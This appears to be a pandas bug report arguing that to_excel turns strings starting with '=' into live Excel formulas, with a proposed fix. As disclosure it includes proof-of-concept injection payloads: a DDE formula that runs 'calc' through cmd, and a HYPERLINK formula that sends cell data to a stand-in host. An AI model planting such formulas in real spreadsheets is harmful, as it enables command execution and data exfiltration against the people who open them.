Description
Code Sample
import pandas as pd
df = pd.DataFrame([
"simple string",
"=2+5+cmd|' /C calc'!A0",
])
df.to_excel("pandas_minimal.xlsx", header=False, index=False, engine="openpyxl")
Problem description
When exporting DataFrames to Excel files (.xlsx) , pandas converts strings starting with =
into Excel formulas. This happens with both .xlsx engines (openpyxl and xlsxwriter).
Expected Output
I expect the Excel file to contain a cell with the text:
=2+5+cmd|' /C calc'!A0"
This a correctness issue: this is probably not what the user expects (especially since this behavior is not documented).
I'd argue this is a security vulnerability as well.
Security considerations
I think this is is a vulnerability in pandas as it could be used by an attacker to inject Excel formulas in the generated .xslx file: this could be used to trigger shell command execution (when opened in
Excel) and data exfiltration (works on LibreOffice as well).
Relationship with CSV injection
This is different from CSV-based injection (but related).
When using the CSV format, cells starting with =
do not have to be considered as formula: this is the consuming software fault if it is processing the data as formula and we can argue [2] that it is not a security issue in the producing software. Moreover there is not clear way to prevent this from happening from the producing software without altering the original data.
However, when exporting to Excel files, each cell can be typed either as string or formula and it is possible to have cells starting with = which are not formulas: it is the producing software responsibility to generate the correct cell.
I would even argue that converting to Excel files instead of CSV files would be a safer route when producing files to be consumed by spreadsheet software because we can prevent this injection from
happening.
Example 1: shell command execution
Here's a minimal example (derived from [4]):
import pandas as pd
df = pd.DataFrame([
"simple string",
"=2+5+cmd|' /C calc'!A0",
])
df.to_excel("pandas_minimal.xlsx", header=False, index=False, engine="openpyxl")
The resulting XSLX file contains:
$ unzip -p pandas_minimal.xlsx xl/worksheets/sheet1.xml | xmllint --format -
<?xml version="1.0"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
<sheetPr>
<outlinePr summaryBelow="1" summaryRight="1"/>
<pageSetUpPr/>
</sheetPr>
<dimension ref="A1:A2"/>
<sheetViews>
<sheetView workbookViewId="0">
<selection activeCell="A1" sqref="A1"/>
</sheetView>
</sheetViews>
<sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
<sheetData>
<row r="1">
<c r="A1" t="inlineStr">
<is>
<t>simple string</t> <!-- This is a plain string. -->
</is>
</c>
</row>
<row r="2">
<c r="A2">
<f>2+5+cmd|' /C calc'!A0</f> <-- This is a formula. -->
<v/>
</c>
</row>
</sheetData>
<pageMargins bottom="1" footer="0.5" header="0.5" left="0.75" right="0.75" top="1"/>
</worksheet>
Notice how the first cell was interpreted as a plain string:
<t>simple string</t>
whereas the second was expanded as a Excel formula:
<f>2+5+cmd|' /C calc'!A0</f>
This happens with both XLSX backends (XlsxWriter) and (OpenPyxl). It could be argued that the problem actually lies in the underlying libraries. It is however possible to prevent the formula injections when using these two libraries. I have patches which fix this issue in pandas (see pull request).
In Excel, this formula can execute a local system command. When used with this payload, Excel actually warns before executing the shell command [1]:
Remote data not accessible
To access this data Excel needs to start another application. Some
legitimate applications and your computer could be used maliciously
to spread viruses or damage your computer. Only click Yes if you
trust the source of this workbook and you want to let the workbook
start the application.
The Excel file might actually be coming from a trusted source (a trusted pandas script executed from a trusted environment): the user would then legitimately want to click on "Yes". However, an attacker
could exploit this behavior in pandas to inject a malicious formula in the trusted Excel file.
Example 2: data exfiltration
Another possibility (which can be triggered through LibreOffice) is data exfiltration from the Excel file to a remote server:
Let's take this example (derived from [3]):
import pandas as pd
df = pd.DataFrame([
"some data",
'=HYPERLINK("http://www.example.com?leak="&B2,"Error, click for details")',
])
df.to_excel("data-exfiltration.xlsx")
It generates a link to:
http://www.example.com/?leak=some%20data
Clicking on this link can be used to exfiltrate data (in this case, the B2 cell from the spreadsheet to a remote server.
References
[1] https://youtu.be/C1o5uVOaufU?t=364
[2] https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection
[3] https://www.notsosecure.com/data-exfiltration-formula-injection/
[4] http://georgemauer.net/2017/10/07/csv-injection.html
Resolution
I think the proper way to handle this is to disable Excel formula injection through .to_excel().
If this behavior is useful for some user, this might be controlled with a parameter of .to_excel(). In this case, the documentation should probably include a warning about the security implications of
enabling this feature. I believe it would be safer to disable this option by default at some point (eg. for pandas 1.0).
Output of pd.show_versions()
commit: None python: 3.7.5.candidate.1 python-bits: 64 OS: Linux OS-release: 5.2.0-3-amd64 machine: x86_64 processor: byteorder: little LC_ALL: None LANG: fr_FR.utf8 LOCALE: fr_FR.UTF-8pandas: 0.23.3
pytest: 3.10.1
pip: 18.1
setuptools: 41.2.0
Cython: None
numpy: 1.16.5
scipy: 1.2.2
pyarrow: None
xarray: None
IPython: 5.8.0
sphinx: None
patsy: None
dateutil: 2.7.3
pytz: 2019.2
blosc: None
bottleneck: None
tables: 3.5.2
numexpr: 2.7.0
feather: None
matplotlib: 3.0.2
openpyxl: 2.4.9
xlrd: 1.1.0
xlwt: 1.3.0
xlsxwriter: None
lxml: 4.4.1
bs4: 4.8.0
html5lib: 1.0.1
sqlalchemy: None
pymysql: None
psycopg2: None
jinja2: 2.10.1
s3fs: None
fastparquet: None
pandas_gbq: None
pandas_datareader: None